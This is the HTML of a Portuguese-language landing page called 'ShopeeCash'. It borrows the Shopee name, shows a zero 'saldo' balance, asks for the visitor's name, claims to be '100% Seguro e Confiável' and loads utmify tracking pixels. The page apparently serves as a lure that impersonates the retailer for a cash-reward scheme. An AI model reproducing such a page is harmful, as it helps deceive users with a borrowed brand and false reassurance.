<!DOCTYPE html>
<html lang="pt-BR">
  <head>
    <meta charset="utf-8" />
    <title>ShopeeCash</title>
    <meta name="description" content="Terapeuta Transforma" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <link rel="icon" href="/logo2.png" />
    <script
      src="https://cdn.utmify.com.br/scripts/utms/latest.js"
      async=""
      defer=""
    ></script>
    <meta name="next-head-count" content="6" />
    <style id="stitches">
      --sxs {
        --sxs: 1 gAyeOI;
      }
      @media {
        * {
          margin: 0;
          padding: 0;
          box-sizing: border-box;
        }
        body {
          color: #fff;
          background: #fff;
          overflow-x: hidden;
          text-align: center;
          -webkit-font-smoothing: antialiased;
        }
        body::-webkit-scrollbar {
          width: 5px;
        }
        body::-webkit-scrollbar-track {
          background-color: rgba(28, 28, 28, 0.332);
        }
        body::-webkit-scrollbar-thumb {
          background: linear-gradient(#557c93, #08203e);
          border-radius: 10px;
        }
        button {
          cursor: pointer;
          border: 0;
          background: transparent;
        }
        body,
        input,
        textarea,
        button {
          font-family: var(--fonts-default);
          font-weight: 400;
        }
      }
      --sxs {
        --sxs: 2 c-cFGopU c-jdnHKv c-jsYYWZ c-jVzYXD c-ilQjYS c-csbVGr c-dpyyaA
          c-hjCwiE c-kAfPqg;
      }
      @media {
        .c-cFGopU {
          width: 100vw;
          min-height: 100vh;
          height: auto;
          display: flex;
          flex-direction: column;
          justify-content: flex-start;
          align-items: center;
        }
        @media (max-width: 768px) {
          .c-cFGopU {
            height: auto;
          }
        }
        .c-jdnHKv {
          max-width: 950px;
          display: flex;
          flex-direction: column;
          justify-content: center;
          align-items: center;
          gap: 4rem;
        }
        @media (max-width: 768px) {
          .c-jdnHKv {
            padding: 0 1rem;
            max-width: 100%;
            gap: 2rem;
          }
        }
        .c-jsYYWZ {
          width: 100vw;
          height: 8rem;
          display: flex;
          justify-content: center;
          align-items: center;
          background: linear-gradient(09deg, #eea849, #f46b45);
          z-index: 1000;
        }
        .c-jVzYXD {
          width: 1140px;
          display: flex;
          justify-content: space-around;
          align-items: center;
          z-index: 1000;
          background: linear-gradient(09deg, #eea849, #f46b45);
        }
        .c-jVzYXD p {
          color: #fff;
          background: #e54300;
          padding: 1rem 2rem;
          border-radius: 999px;
          font-weight: 700;
          font-size: 1.5rem;
        }
        @media (max-width: 768px) {
          .c-jVzYXD p {
            padding: 0.7rem 1rem;
            font-size: 1.3rem;
          }
        }
        @media (max-width: 768px) {
          .c-jVzYXD {
            position: fixed;
            top: 0rem;
            width: 100%;
            padding: 1rem 0;
          }
        }
        @media (max-width: 768px) {
          .c-ilQjYS {
            display: none;
          }
        }
        .c-csbVGr {
          display: none;
        }
        @media (max-width: 768px) {
          .c-csbVGr {
            display: block;
          }
        }
        .c-dpyyaA {
          width: 45rem;
          height: auto;
          padding: 1.5rem;
          background: #ffd7c9;
          color: #000;
          border-radius: 25px;
          display: flex;
          flex-direction: column;
          align-items: center;
          justify-content: center;
          gap: 1rem;
          border: 2px solid #ff580c;
          box-shadow: 0 0px 20px 1px #f46b45;
        }
        @media (max-width: 768px) {
          .c-dpyyaA {
            width: 100%;
            gap: 1rem;
          }
        }
        .c-dpyyaA button {
          width: 100%;
          background: linear-gradient(09deg, #f46b45, #eea849);
          border-radius: 0.4rem;
          font-size: 1rem;
          font-weight: bold;
          padding: 1rem 2.8rem;
          color: #fff;
          display: flex;
          align-items: center;
          justify-content: center;
          gap: 0.4rem;
        }
        .c-dpyyaA button:disabled {
          background: #ccc;
          cursor: not-allowed;
        }
        .c-dpyyaA h1 {
          font-size: 2.2rem;
          font-weight: 500;
        }
        .c-dpyyaA img {
          border-radius: 15px;
        }
        .c-dpyyaA input {
          border: 1px solid #ff580c;
          outline: none;
        }
        .c-hjCwiE {
          width: 100%;
          display: flex;
          flex-direction: column;
          align-items: center;
          justify-content: center;
          gap: 0.8rem;
        }
        .c-hjCwiE p {
          font-size: 1rem;
          font-weight: 400;
        }
        .c-hjCwiE input {
          width: 350px;
          border-radius: 15px;
          padding: 0.6rem 1rem;
          font-size: 1.2rem;
        }
        @media (max-width: 768px) {
          .c-hjCwiE input {
            width: 100%;
          }
        }
        .c-kAfPqg {
          width: 45rem;
          display: flex;
          justify-content: center;
          align-items: center;
          background: linear-gradient(09deg, #eea849, #f46b45);
          box-shadow: 0 10px 15px -6px #f46b45;
          gap: 0.3rem;
          border-radius: 10px;
          font-weight: bold;
          padding: 1rem 0;
        }
        @media (max-width: 768px) {
          .c-kAfPqg {
            width: 100%;
          }
        }
      }
    </style>
    <script>
      window.pixelId = &quot;66d0fdb34f04fa44c5955f2c&quot;; var a = document.createElement(&quot;script&quot;); a.setAttribute(&quot;async&quot;, &quot;&quot;); a.setAttribute(&quot;defer&quot;, &quot;&quot;); a.setAttribute(&quot;src&quot;, &quot;https://cdn.utmify.com.br/scripts/pixel/pixel.js&quot;); document.head.appendChild(a);
    </script>
    <link
      rel="preload"
      href="/_next/static/media/02edef4d0edfad6d-s.p.woff2"
      as="font"
      type="font/woff2"
      crossorigin="anonymous"
      data-next-font="size-adjust"
    />
    <link
      rel="preload"
      href="/_next/static/media/045832894acda0e9-s.p.woff2"
      as="font"
      type="font/woff2"
      crossorigin="anonymous"
      data-next-font="size-adjust"
    />
    <link
      rel="preload"
      href="/_next/static/media/120a5a1920781bd0-s.p.woff2"
      as="font"
      type="font/woff2"
      crossorigin="anonymous"
      data-next-font="size-adjust"
    />
    <link
      rel="preload"
      href="/_next/static/media/da897b99eb1fe4a1-s.p.woff2"
      as="font"
      type="font/woff2"
      crossorigin="anonymous"
      data-next-font="size-adjust"
    />
    <link
      rel="preload"
      href="/_next/static/media/6ebb97b5c9fa4e03-s.p.woff2"
      as="font"
      type="font/woff2"
      crossorigin="anonymous"
      data-next-font="size-adjust"
    />
    <link
      rel="preload"
      href="/_next/static/media/c714540e49ad5111-s.p.woff2"
      as="font"
      type="font/woff2"
      crossorigin="anonymous"
      data-next-font="size-adjust"
    />
    <link
      rel="preload"
      href="/_next/static/css/4df78f2cd73d6b26.css"
      as="style"
    />
    <link
      rel="stylesheet"
      href="/_next/static/css/4df78f2cd73d6b26.css"
      data-n-g=""
    />
    <link
      rel="preload"
      href="/_next/static/css/497e90ea03cdc1d1.css"
      as="style"
    />
    <link
      rel="stylesheet"
      href="/_next/static/css/497e90ea03cdc1d1.css"
      data-n-p=""
    />
    <noscript data-n-css=""></noscript>
    <script
      defer=""
      nomodule=""
      src="/_next/static/chunks/polyfills-78c92fac7aa8fdd8.js"
    ></script>
    <script
      src="/_next/static/chunks/webpack-ee7e63bc15b31913.js"
      defer=""
    ></script>
    <script
      src="/_next/static/chunks/framework-7a7e500878b44665.js"
      defer=""
    ></script>
    <script
      src="/_next/static/chunks/main-92011a1a7f336a6f.js"
      defer=""
    ></script>
    <script
      src="/_next/static/chunks/pages/_app-b7d1d75b35379d7b.js"
      defer=""
    ></script>
    <script
      src="/_next/static/chunks/959-00cce35069a0d889.js"
      defer=""
    ></script>
    <script
      src="/_next/static/chunks/pages/index-300ddbeca8befacc.js"
      defer=""
    ></script>
    <script
      src="/_next/static/zzwqogtXZ7JHuyZfGSOmU/_buildManifest.js"
      defer=""
    ></script>
    <script
      src="/_next/static/zzwqogtXZ7JHuyZfGSOmU/_ssgManifest.js"
      defer=""
    ></script>
  </head>
  <body>
    <div id="__next">
      <main class="c-cFGopU __className_371575">
        <div class="c-jdnHKv">
          <div class="c-jsYYWZ">
            <div class="c-jVzYXD">
              <div class="c-ilQjYS">
                <img
                  alt="logo"
                  loading="lazy"
                  width="300"
                  height="60"
                  decoding="async"
                  data-nimg="1"
                  style="color: transparent"
                  srcset="/_next/image2.webp, /_next/image.webp"
                  src="/_next/image.webp"
                />
              </div>
              <div class="c-csbVGr">
                <img
                  alt="logo"
                  loading="lazy"
                  width="100"
                  height="100"
                  decoding="async"
                  data-nimg="1"
                  style="color: transparent"
                  srcset="/_next/image.webp, /_next/image.webp"
                  src="/_next/image.webp"
                />
              </div>
              <p>
                SALDO: R$
                <!-- -->00,00
              </p>
            </div>
          </div>
          <div class="c-dpyyaA">
            <h1>
              Bem vindo ao <span style="color: #ff580c">Shopee</span>Cash!
            </h1>
            <div class="c-hjCwiE">
              <p>Digite seu nome:</p>
              <input type="text" value="" />
              <div><button disabled="">Continuar</button></div>
            </div>
          </div>
          <div class="c-kAfPqg">
            <svg
              xmlns="http://www.w3.org/2000/svg"
              width="15"
              height="15"
              fill="#fff"
              viewBox="0 0 256 256"
            >
              <rect width="256" height="256" fill="none"></rect>
              <path
                d="M208,80H172V52a44,44,0,0,0-88,0V80H48A16,16,0,0,0,32,96V208a16,16,0,0,0,16,16H208a16,16,0,0,0,16-16V96A16,16,0,0,0,208,80ZM100,52a28,28,0,0,1,56,0V80H100Z"
              ></path>
            </svg>
            <p>100% Seguro e Confiável</p>
          </div>
        </div>
      </main>
    </div>
    <script id="__NEXT_DATA__" type="application/json">
      {
        "props": { "pageProps": {} },
        "page": "/",
        "query": {},
        "buildId": "zzwqogtXZ7JHuyZfGSOmU",
        "nextExport": true,
        "autoExport": true,
        "isFallback": false,
        "scriptLoader": []
      }
    </script>
  </body>
</html>
